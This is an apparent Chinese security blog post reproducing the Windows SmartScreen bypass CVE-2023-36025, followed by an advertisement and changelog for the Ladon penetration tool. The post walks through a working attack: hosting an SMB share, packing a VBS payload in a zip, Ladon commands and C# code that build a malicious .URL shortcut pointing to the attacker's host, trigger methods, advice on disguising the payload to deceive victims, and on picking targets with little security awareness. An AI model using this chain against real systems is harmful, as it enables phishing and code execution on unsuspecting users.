漏洞补丁已出3个月,URL格式,对于有点安全意识的人来说,几乎不会点,加上补丁,成功率会很低,所以仅为复现学习,使用者后果自负。
漏洞简介
CVE-2023-36025是微软于11月补丁日发布的安全更新中修复Windows SmartScreen安全功能绕过漏洞。攻击者可以通过诱导用户单击特制的URL来利用该漏洞,对目标系统进行攻击。成功利用该漏洞的攻击者能够绕过Windows Defender SmartScreen检查及其相关提示。该漏洞的攻击复杂性较低,可创建并诱导用户点击恶意设计的 Internet 快捷方式文件 (.URL) 或指向此类文件的超链接来利用该漏洞,无需特殊权限即可通过互联网进行利用。
影响范围
Win7
Win10
Win11
Win2008
Win2012
Win2016
Win2019
Win2022
漏洞复现
条件:
1.目标能访问到SMB共享(VPS外网或内网架设都可以)
2.需用户点击POC文件(自己想办法)
一、开启SMB服务器
关闭系统SMB服务,不让445端口占用,使用CloseSMB模块,重启生效,当然也可以不关闭,直接使用系统的开启SMB共享,因为这洞和Win11主题RCE不一样,不需要特制SMB共享。
关闭SMB
Ladon CloseSMB
PS: 彻底关闭445端口,SMB相关服务,重启生效,可防止SMB漏洞或新出0day攻击,在VPS上使用一键程序会比开启系统SMB要安全很多,除非别人挖Ladon的SMB服务器漏洞,且用完就关,很安全。
一键开启SMB匿名共享
Ladon SmbServer
资源管理器访问\192.168.50.165test,看到共享即为成功
二、 程序同根目录下放share目录
share目录里放一个test.zip文件,test.zip压缩test.vbs文件,test.vbs内容为自己的内容,样例为弹框。通过共享访问,应该看到share里面的内容,共享名称为test
直接双击vbs、exe、bat等有“安全警告” ,点打开后才执行
打开zip文件,也会有提示(在win7下,其它系统zip好像直接目录浏览)
三、生成url文件poc
支持IP、URL、UNC以及file完整路径格式,填写IP默认POC请求指向test目录下test.zip/test.vbs文件
Ladon GenURL 192.168.188.2
Ladon GenURL http://192.168.188.2
Ladon GenURL \192.168.50.189test
Ladon GenURL \192.168.188.2
Ladon GenURL \192.168.188.2
Ladon GenURL file://192.168.188.2/test/test.zip/test.vbs
Ladon GenURL file://192.168.188.2/test
Ladon GenURL file://192.168.188.2/
测试win11也是一样,直接执行
通过Ladon控制台可以看到Win7和Win11都访问了我们的SMB,查看SmbServer.log日志,可看到访问了test.zip文件,若是实战,可用于确认目标是否点击,如果是其它漏洞,我们也可以确认目标是否触发,如域打印机提权,DLL也需要SMB共享,上次win11的RCE也是一样。
using System;
using System.IO;
class Program
{
static void Main(string[] args)
{
if (args.Length < 1)
{
Console.WriteLine("ip");
return;
}
string ip = args[0];
string url = "file://" + ip + "/test/test.zip/test.vbs";
string content = "[InternetShortcut]nURL=" + url + "nIDList=n";
File.WriteAllText("test.url", content);
}
}
触发方式 1.直接打开或双击poc文件会触发
2.zip、rar、7z等压缩包里双击poc也会触发
3.解压后,打开或双击poc文件会触发(就是1)
解压后,使用Ladon生成的文件,不是互联网图标。
对VBS进行修改,将其伪装成打开TXT(再执行代码),更具迷惑性。
PS:尝试伪装成任意图标,不管是全路径还是URL,均失败
小结
漏洞补丁已发布3个月,即使杀软或EDR不拦截也不一定能触发,发的是URL文件,不是DOC、PDF、Excel这种正常文档文件,别人点击的概率低。当然如果你的文案好,或组合其它漏洞链接到url文件,再加上一点运气,可能不会空军。有些附件只允许ZIP、RAR文档,想诱导人点URL文件可能更难,但这个绕过技巧,还是值得学习,或许组合其它漏洞可以发挥更大作用。
系统漏洞和office漏洞不一样,出补丁,系统更新或杀软也会补上,但是office用户不打补丁,杀软也不是针对漏洞点拦截,旧洞只要做好免杀,就能用,所以不能一概而论,此漏洞对有点安全意识的人可能没用,因为至少它们知道不熟悉的后缀不要点,但对于没有安全意识的,看图标无害,杀软也不杀,他们就点了,所以成功率高不高,取决于目标,如果确定目标意识差,可以尝试。
Ladon简介
Ladon单兵作战综合工具、模块化网络渗透工具,可PowerShell模块化、可CS插件化、可内存加载,无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。12.4版本内置265个功能模块,外部模块18个,网络资产探测模块30个通过多种协议(ICMPNBTDNSMACSMBWMISSHHTTPHTTPSExchangemssqlFTPRDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息,高危漏洞检测16个包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等,密码审计23个含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别135+(Web应用、中间件、脚本类型、页面类型)等,本地提权21+含SweetPotatoBadPotatoEfsPotatoBypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动 内网渗透。
Ladon早期功能只是内网渗透扫描器,所以大家误以为Ladon只是内网渗透工具,随着版本更迭,这2年不管是外网渗透、内网渗透、Web渗透还是后渗透,如前渗透,使用相关搜索引擎导出探测好的IP或URL,即可直接用Ladon批量利用新出漏洞获取大量权限。后渗透拿到权限后,不管是操作系统提权、数据库提权,或是横向执行命令、域渗透模块等,各种功能应有尽有,一个工具解决大量问题,所以定义单兵综合作战工具。
Ladon 12.4
Ladon 12.4 20240108
[ ]SmbServer 支持Smb v1 v2 v3协议
[ ]HtaServer 支持自定义端口
[-2023-36025或其它漏洞) ]GenURL 生成url文件(Windows RCE CVE
[ ]SslInfo 输出SslInfo.log日志
[ ]SmbServer 修复写日志崩溃的Bug,日志文件为SmbServer.log
12.28
[ ]SslInfo 输出SslInfo.txt日志,解决一些语言乱码问题
[ ]cmddll 修复Win7/Win8下GUI生成DLL的问题
12.3 20231221
[ ]SmbServer 一键SMB共享服务器,记录来访IP,访问资源等
[-2023-38146 Win11主题远程执行Exploit ]Win11ThemeRce CVE
12.15
[2 官方驱动>=net 4.8 大小4.9M不内置 ]OracleCmd2 Oracle数据库远程提权工具
Ladon 12.2 12.14
[3种方法一键提权 ]OracleCmd Oracle数据库远程提权工具
支持Windows/Linux/MacOS等服务器操作系统
支持高版本Oracle 12G、11G、12G及之前版本
[ ]FindAD PVEFindADUser可用于查找活动目录用户登陆的位置、枚举域用户
Ladon 12.1 12.08
[ ]LotusAdmin 检测用户是否Lotus管理员
[ ]HtaSer Hta服务器(不限后缀,如访问doc执行hta)
[ ]ConfVer ConfluenceVer探测Confluence版本
Ladon 12.0 20231201
[ ]DomainLog DomainUserIP 远程查询 域用户、IP
[4624成功日志 域用户、域名、登陆IP ]LoginLog
/all 导出全部日志 原始数据
LoginLog 用户名
LoginLog 用户名 记录数
==========================================================
Ladon 11.9 20231105
[ ]LadonStudy 支持bypassEDR
[1.2 ]LadonShell 支持tls
[ ]RdpInfo 优化RDP Ntlm探测系统信息
[3389连接日志(IP、用户名、CertHash) ]RdpLog 查看
[-2023-46604 ActiveMQ CVE-2023-46604 RCE Exploit ]CVE
Ladon 11.8 20231018
[ ]InfoScan 新增SmtpInfo
[25、465、587端口) ]SmtpInfo 新增Smtp Ntlm探测系统信息(
[ ]InfoScan 新增HttpInfo
[ ]HttpInfo 新增Http/Https Ntlm探测系统信息(SharePoint)
原文始发于微信公众号(K8实验室):全版本Windows RCE漏洞复现CVE-2023-36025